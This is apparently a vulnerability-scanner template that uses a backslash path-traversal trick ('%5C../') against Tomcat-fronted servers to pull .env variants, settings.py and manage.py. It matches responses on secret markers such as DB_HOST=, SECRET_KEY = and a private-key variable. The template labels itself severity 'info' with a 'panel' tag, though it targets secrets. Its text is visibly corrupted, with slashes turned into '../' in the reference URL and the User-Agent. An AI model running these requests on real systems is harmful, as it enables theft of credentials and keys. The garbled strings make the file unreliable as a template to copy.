id: tomcat-manager-pathnormalization-135
info:
  author: organiccrap
  name: Tomcat Manager Path Normalization
  reference: https:../../i.blackhat.com../us-18../Wed-August-8../us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
  severity: info
  tags: panel
requests:
- headers:
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit../537.36 (KHTML,
      like Gecko) Chrome../91.0.4472.124 Safari../537.36
  matchers:
  - type: word
    words:
    - DB_HOST=
    - DB_USERNAME
    - org.springframework.boot.actuate
    - docker exec
    - SECRET_KEY =
    - DISTIMO_PRIVATE_KEY
    - Developers that use our General Public Licenses
  method: GET
  path:

  - '{{BaseURL}}/%5C../.env.bak'
  - '{{BaseURL}}/%5C../.env.dev'
  - '{{BaseURL}}/%5C../.env.dev.local'
  - '{{BaseURL}}/%5C../.env.development.local'
  - '{{BaseURL}}/%5C../.env.prod'
  - '{{BaseURL}}/%5C../.env.prod.local'
  - '{{BaseURL}}/%5C../.env.production'
  - '{{BaseURL}}/%5C../.env.production.local'
  - '{{BaseURL}}/%5C../.env.local'
  - '{{BaseURL}}/%5C../.env.example'
  - '{{BaseURL}}/%5C../.env.stage'
  - '{{BaseURL}}/%5C../.env.live'
  - '{{BaseURL}}/%5C../.env.backup'
  - '{{BaseURL}}/%5C../.env.save'
  - '{{BaseURL}}/%5C../.env.old'
  - '{{BaseURL}}/%5C../.env.www'
  - '{{BaseURL}}/%5C../.env_1'
  - '{{BaseURL}}/%5C../.env_sample'
  - '{{BaseURL}}/%5C../.env.{{DN}}'
  - '{{BaseURL}}/%5C../.env.{{SD}}'
  - '{{BaseURL}}/%5C../api../.env'
  - '{{BaseURL}}/%5C../README.md'
  - '{{BaseURL}}/%5C../mobs/settings.py'
  - '{{BaseURL}}/%5C../settings.py'
  - '{{BaseURL}}/%5C../manage.py'
  - '{{BaseURL}}/%5C../monit/COPYING'
